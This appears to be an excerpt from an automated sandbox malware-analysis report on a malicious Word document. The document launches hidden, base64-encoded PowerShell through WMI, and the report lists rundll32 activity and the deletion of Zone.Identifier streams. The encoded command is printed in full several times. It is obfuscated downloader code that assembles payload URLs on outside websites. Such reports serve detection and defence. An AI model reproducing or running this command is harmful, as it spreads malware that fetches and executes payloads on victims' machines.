                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                    Suspicious powershell command line foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret 7_2_10008098
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret 7_2_10004AED

                    Persistence and Installation Behavior:

                    barindex
                    Creates processes via WMIShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Iiasa\gdao.xuk:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pqftsc\netes.ucb:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
